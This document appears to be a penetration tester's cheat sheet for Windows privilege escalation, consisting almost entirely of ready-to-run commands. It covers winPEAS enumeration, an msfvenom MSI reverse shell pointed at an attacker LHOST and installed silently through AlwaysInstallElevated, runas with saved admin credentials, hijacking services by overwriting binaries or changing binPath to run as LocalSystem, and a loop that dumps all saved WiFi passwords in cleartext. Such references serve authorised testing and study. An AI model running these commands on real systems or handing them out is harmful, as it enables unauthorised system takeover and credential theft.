Windows Privilege Escalation

#Enable Colors
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

#Run winpeas, do not print banner, perform all checks, do not sleep. Use 'notcolor' to avoid color output
winpeas.exe quiet cmd searchfast > <output>

#User Information Checks
winpeas.exe quiet userinfo

#Application Information Checks
winpeas.exe quiet application info

#Credential Checks
winpeas.exe quiet windowscred

#Files Information Checks
winpeas.exe quiet filesinfo

#Query the registry to confirm two registry entries are configured/vulnerable - "AlwaysInstallElevated" value must be set to 1 for both the local machine and current user
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

#Create MSI reverse shell with msfvenom
msfvenom -p <payload> LHOST=<IP_ADDRESS> -f msi -o <output_filename.msi>

#Execute the MSI file
msiexec /quiet /qn /i <output_filename.msi>

#Search for stored credentials for admins
cmdkey /list

#Use native runas command to execute a payload under the context of an admin
runas /savecred /user:<USER_NAME> <C:\Path_to\PrivEscPayload…>

#Query all services (service_name, display_name, type, state)
sc query state= all

#Query individual service information (type, state_type, binary_path_name, dependencies, service_start_name)
sc qc <SERVICE_NAME>

#One-liner to query each service_name using sc query, and pass each service_name into sc qc
for /f "tokens=2" %s in ('sc query state^= all ^| find "SERVICE_NAME"') do @sc qc %s

#Check for services that have unquoted service paths:
for /f "tokens=2" %s in ('sc query state^= all ^| find "SERVICE_NAME"') do @sc qc %s

#Enumerate targeted service(s) names, binary paths, type, state, and dependencies
sc query <SERVICE_NAME>
sc qc <SERVICE_NAME>

#Check if we have permissions to start and/or stop the service(s) (SERVICE_STOP, SERVICE_START) or higher level of access (SERVICE_ALL_ACCESS))
##Supress errors, Name is Windows Service, Omit Banner, Verbose
accesschk.exe /accepteula -ucqv <current_user> <service_name>

#Check for write permissions in each directory in the existing binary path
##Supress errors, show objects with write access, only process directories, omit banner
accesschk.exe /accepteula -uwdq "C:\file path\executable_name"
	
#Place payload in writeable path
##C:\file path\service.exe where service.exe is our reverse shell executable

#Stop and/or Start service, or force restart the machine 
net stop <SERVICE_NAME>
net start <SERVICE_NAME>

#Check for binaries that our current user has access to
##Using Accesschk - Suppress errors, show objects with write access, recursive search
accesschk.exe /accepteula -uws <USERNAME_or_EVERYONE> "C:\Program Files\"
##Using PowerShell - Get the ACL for all files in Program Files that are modifiable by "Everyone"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"} | Format-Table -Wrap

#Check if any services are running the writable/modifiable binaries, or from a non-standard location (e.g. not C:\Program Files...)
for /f "tokens=2" %s in ('sc query state^= all ^| find "SERVICE_NAME"') do @sc qc %s

#Check if we have permissions to start and/or stop the service(s) (SERVICE_STOP, SERVICE_START) or higher level of access (SERVICE_ALL_ACCESS))
##Supress errors, Name is Windows Service, Omit Banner, Verbose
accesschk.exe /accepteula -ucqv <CURRENT_USER> <SERVICE_NAME>

#Stop the service 
net stop <SERVICE_NAME>

#Backup the binary
copy <binary> <backup_binary>

#Overwrite the original binary with a payload

#Start the service
net start <SERVICE_NAME>

#Check for services we have write access to and can start/stop (SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS, SERVICE_STOP, SERVICE_START)
##Suppress errors, show only objects with write access, Name is a Windows Service, omit banner, verbose output
accesschk.exe /accepteula -uwcqv <current_user>  *


#Query individual service information (or use the "for" script from above) to view the options we could reconfigure, the privileges (SERVICE_START_NAME), dependencies, Binary Path, etc.
sc qc <SERVICE_NAME>
sc query <SERVICE_NAME>

#Stop the service (if necessary)
net stop <SERVICE_NAME>

#Reconfigure options as needed
##Example modify BINARY_PATH_NAME
sc config <service_name> binPath= "C:\...\file.exe"
##Example removed Dependency
sc config <service_name> depend= ""
##Example modify privileges of service being started (SERVICE_START_NAME)
sc config <service_name> obj= ".\LocalSystem" password= ""

#Start the service
net start <SERVICE_NAME>

#WiFi passwords can be revealed in cleartext with the following command. Useful to build a dictionary and check for password reuse:
netsh wlan show profiles name="<network_name>" key=clear

#Script that loops through each wlan network name and outputs the cleartext passwords for each (NetworkName:Password)
FOR /f "tokens=5" %i in ('netsh wlan show profiles ^| find "All User Profile"') do @FOR /f "tokens=4" %s in ('netsh wlan show profiles name^="%i" key^=clear ^| find "Key Content"') do @echo %i:%s